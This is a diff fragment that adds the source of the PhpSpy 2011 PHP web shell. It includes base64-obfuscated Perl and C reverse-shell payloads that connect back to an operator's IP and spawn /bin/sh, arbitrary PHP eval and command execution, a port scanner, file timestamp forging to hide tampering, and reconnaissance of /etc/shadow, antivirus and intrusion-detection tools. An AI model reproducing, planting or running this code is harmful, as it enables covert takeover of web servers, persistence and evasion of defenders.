+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
+					p('</tr>');
+				}
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('<td>Operate</td>');
+				p('</tr>');
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end mysql
+
+elseif ($action == 'backconnect') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '12345';
+	$usedb = array('perl'=>'perl','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+	if ($start && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/angel_bc',$back_connect);
+			$res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
+		} else {
+			cf('/tmp/angel_bc.c',$back_connect_c);
+			$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
+			@unlink('/tmp/angel_bc.c');
+			$res = execute("/tmp/angel_bc $yourip $yourport &");
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','backconnect');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+}//end
+
+elseif ($action == 'portscan') {
+	!$scanip && $scanip = '127.0.0.1';
+	!$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
+	formhead(array('title'=>'Port Scan'));
+	makehide('action','portscan');
+	p('<p>');
+	p('IP:');
+	makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
+	p('Port:');
+	makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
+	makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+	if ($startscan) {
+		p('<h2>Result &raquo;</h2>');
+		p('<ul class="info">');
+		foreach(explode(',', $scanport) as $port) {
+			$fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1); 
+			if (!$fp) {
+				p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
+		   } else {
+				p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
+				@fclose($fp);
+		   } 
+		}
+		p('</ul>');
+	}
+}
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+	
+	goback();
+
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone folder/file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter folder/file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference folder/file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current folder/file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+	goback();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>htmlspecialchars($command)));
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo(execute($command));
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:g(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+elseif ($action == 'secinfo') {
+	
+	secparam('Server software', @getenv('SERVER_SOFTWARE'));
+	secparam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
+	secparam('Open base dir', @ini_get('open_basedir'));
+	secparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
+	secparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
+	secparam('cURL support', function_exists('curl_version')?'enabled':'no');
+	$temp=array();
+	if(function_exists('mysql_get_client_info'))
+		$temp[] = "MySql (".mysql_get_client_info().")";
+	if(function_exists('mssql_connect'))
+		$temp[] = "MSSQL";
+	if(function_exists('pg_connect'))
+		$temp[] = "PostgreSQL";
+	if(function_exists('oci_connect'))
+		$temp[] = "Oracle";
+	secparam('Supported databases', implode(', ', $temp));
+	
+	if( !IS_WIN ) {
+		$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
+		$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
+		$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
+		secparam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes" : 'no');
+		secparam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes" : 'no');
+		secparam('OS version', @file_get_contents('/proc/version'));
+		secparam('Distr name', @file_get_contents('/etc/issue.net'));
+		$safe_mode = @ini_get('safe_mode');
+		if(!$GLOBALS['safe_mode']) {
+			$temp=array();
+			foreach ($userful as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Userful', implode(', ',$temp));
+			$temp=array();
+			foreach ($danger as $item)
+				if(which($item)){$temp[]=$item;}
+			secparam('Danger', implode(', ',$temp));
+			$temp=array();
+			foreach ($downloaders as $item) 
+				if(which($item)){$temp[]=$item;}
+			secparam('Downloaders', implode(', ',$temp));
+			secparam('Hosts', @file_get_contents('/etc/hosts'));
+			secparam('HDD space', execute('df -h'));
+			secparam('Mount options', @file_get_contents('/etc/fstab'));
+		}
+	} else {
+		secparam('OS Version',execute('ver'));
+		secparam('Account Settings',execute('net accounts'));
+		secparam('User Accounts',execute('net user'));
+		secparam('IP Configurate',execute('ipconfig -all'));
+	}
+}//end
+
+else {
+	m('Undefined Action');
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	Powered by <a title="Build 20110502" href="http://www.4ngel.net" target="_blank"><?php echo str_replace('.','','P.h.p.S.p.y');?> 2011</a>. Copyright (C) 2004-2011 <a href="http://www.4ngel.net" target="_blank">Security Angel Team [S4T]</a> All Rights Reserved.
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+函数库
+======================================================*/
+
+function secparam($n, $v) {
+	$v = trim($v);
+	if($v) {
+		p('<h2>'.$n.' &raquo;</h2>');
+		p('<div class="infolist">');
+		if(strpos($v, "\n") === false)
+			p($v.'<br />');
+		else
+			p('<pre>'.$v.'</pre>');
+		p('</div>');
+	}
+}
+function m($msg) {
+	echo '<div style="margin:10px auto 15px auto;background:#ffffe0;border:1px solid #e6db55;padding:10px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife;
+	$key = ($prefix ? $cookiepre : '').$key;
+	$life = $life ? $life : $cookielife;
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $cookiepath, $cookiedomain, $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// 登陆入口
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="action" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+function dirsize($dir) { 
+	$dh = @opendir($dir);
+	$size = 0;
+	while($file = @readdir($dh)) {
+		if ($file != '.' && $file != '..') {
+			$path = $dir.'/'.$file;
+			$size += @is_dir($path) ? dirsize($path) : @filesize($path);
+		}
+	}
+	@closedir($dh);
+	return $size;
+}
+// 页面调试信息
+function debuginfo() {
+	global $starttime;
+	$mtime = explode(' ', microtime());
+	$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
+	echo 'Processed in '.$totaltime.' second(s)';
+}
+
+//连接MYSQL数据库
+function mydbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
+	global $charsetdb;
+	@ini_set('mysql.connect_timeout', 5);
+	if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
+		p('<h2>Can not connect to MySQL server</h2>');
+		exit;
+	}
+	if($link && $dbname) {
+		if (!@mysql_select_db($dbname, $link)) {
+			p('<h2>Database selected has error</h2>');
+			exit;
+		}
+	}
+	if($link && mysql_get_server_info() > '4.1') {
+		if($charset && in_array(strtolower($charset), $charsetdb)) {
+			q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
+		}
+	}
+	return $link;
+}
+
+// 去掉转义字符
+function s_array(&$array) {
+	if (is_array($array)) {
+		foreach ($array as $k => $v) {
+			$array[$k] = s_array($v);
+		}
+	} else if (is_string($array)) {
+		$array = stripslashes($array);
+	}
+	return $array;
+}
+
+// 清除HTML代码
+function html_clean($content) {
+	$content = htmlspecialchars($content);
+	$content = str_replace("\n", "<br />", $content);
+	$content = str_replace("  ", "&nbsp;&nbsp;", $content);
+	$content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
+	return $content;
+}
+
+// 获取权限
+function getChmod($filepath){
+	return substr(base_convert(@fileperms($filepath),10,8),-4);
+}
+
+function getPerms($filepath) {
+	$mode = @fileperms($filepath);
+	if (($mode & 0xC000) === 0xC000) {$type = 's';}
+	elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
+	elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
+	elseif (($mode & 0x8000) === 0x8000) {$type = '-';} 
+	elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
+	elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
+	elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
+	else {$type = '?';}
+
+	$owner['read'] = ($mode & 00400) ? 'r' : '-'; 
+	$owner['write'] = ($mode & 00200) ? 'w' : '-'; 
+	$owner['execute'] = ($mode & 00100) ? 'x' : '-'; 
+	$group['read'] = ($mode & 00040) ? 'r' : '-'; 
+	$group['write'] = ($mode & 00020) ? 'w' : '-'; 
+	$group['execute'] = ($mode & 00010) ? 'x' : '-'; 
+	$world['read'] = ($mode & 00004) ? 'r' : '-'; 
+	$world['write'] = ($mode & 00002) ? 'w' : '-'; 
+	$world['execute'] = ($mode & 00001) ? 'x' : '-'; 
+
+	if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
+	if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
+ 
+	return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
+}
+
+function getUser($filepath)	{
+	if (function_exists('posix_getpwuid')) {
+		$array = @posix_getpwuid(@fileowner($filepath));
+		if ($array && is_array($array)) {
+			return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
+		}
+	}
+	return '';
+}
+
+// 删除目录
+function deltree($deldir) {
+	$mydir=@dir($deldir);	
+	while($file=$mydir->read())	{ 		
+		if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) { 
+			@chmod($deldir.'/'.$file,0777);
+			deltree($deldir.'/'.$file); 
+		}
+		if (is_file($deldir.'/'.$file)) {
+			@chmod($deldir.'/'.$file,0777);
+			@unlink($deldir.'/'.$file);
+		}
+	} 
+	$mydir->close(); 
+	@chmod($deldir,0777);
+	return @rmdir($deldir) ? 1 : 0;
+}
+
+// 表格行间的背景色替换
+function bg() {
+	global $bgc;
+	return ($bgc++%2==0) ? 'alt1' : 'alt2';
+}
+
+// 获取当前的文件系统路径
+function getPath($scriptpath, $nowpath) {
+	if ($nowpath == '.') {
+		$nowpath = $scriptpath;
+	}
+	$nowpath = str_replace('\\', '/', $nowpath);
+	$nowpath = str_replace('//', '/', $nowpath);
+	if (substr($nowpath, -1) != '/') {
+		$nowpath = $nowpath.'/';
+	}
+	return $nowpath;
+}
+
+// 获取当前目录的上级目录
+function getUpPath($nowpath) {
+	$pathdb = explode('/', $nowpath);
+	$num = count($pathdb);
+	if ($num > 2) {
+		unset($pathdb[$num-1],$pathdb[$num-2]);
+	}
+	$uppath = implode('/', $pathdb).'/';
+	$uppath = str_replace('//', '/', $uppath);
+	return $uppath;
+}
+
+// 检查PHP配置参数
+function getcfg($varname) {
+	$result = get_cfg_var($varname);
+	if ($result == 0) {
+		return 'No';
+	} elseif ($result == 1) {
+		return 'Yes';
+	} else {
+		return $result;
+	}
+}
+
+// 检查函数情况
+function getfun($funName) {
+	return (false !== function_exists($funName)) ? 'Yes' : 'No';
+}
+
+// 获得文件扩展名
+function getext($file) {
+	$info = pathinfo($file);
+	return $info['extension'];
+}
+
+function GetWDirList($dir){
+	global $dirdata,$j,$nowpath;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				if (is_writable($f)) {
+					$dirdata[$j]['filename']=str_replace($nowpath,'',$f);
+					$dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$dirdata[$j]['dirchmod']=getChmod($f);
+					$dirdata[$j]['dirperm']=getPerms($f);
+					$dirdata[$j]['dirlink']=$dir;
+					$dirdata[$j]['server_link']=$f;
+					$j++;
+				}
+				GetWDirList($f);
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $dirdata;
+	} else {
+		return array();
+	}
+}
+
+function GetWFileList($dir){
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getext($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetWFileList($f);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				if (is_writable($f)) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
+					$filedata[$j]['fileowner']=getUser($f);
+					$filedata[$j]['dirlink']=$dir;
+					$filedata[$j]['server_link']=$f;
+					$j++;
+				}
+			}
+		}
+		closedir($dh);
+		clearstatcache();
+		return $filedata;
+	} else {
+		return array();
+	}
+}
+
+function GetSFileList($dir, $content, $re = 0) {
+	global $filedata,$j,$nowpath, $writabledb;
+	!$j && $j=1;
+	if ($dh = opendir($dir)) {
+		while ($file = readdir($dh)) {
+			$ext = getext($file);
+			$f=str_replace('//','/',$dir.'/'.$file);
+			if($file!='.' && $file!='..' && is_dir($f)){
+				GetSFileList($f, $content, $re = 0);
+			} elseif($file!='.' && $file!='..' && is_file($f) && in_array($ext, explode(',', $writabledb))){
+				$find = 0;
+				if ($re) {
+					if ( preg_match('@'.$content.'@',$file) || preg_match('@'.$content.'@', @file_get_contents($f)) ){
+						$find = 1;
+					}
+				} else {
+					if ( strstr($file, $content) || strstr( @file_get_contents($f),$content ) ) {
+						$find = 1;
+					}
+				}
+				if ($find) {
+					$filedata[$j]['filename']=str_replace($nowpath,'',$f);
+					$filedata[$j]['size']=sizecount(@filesize($f));
+					$filedata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
+					$filedata[$j]['filechmod']=getChmod($f);
+					$filedata[$j]['fileperm']=getPerms($f);
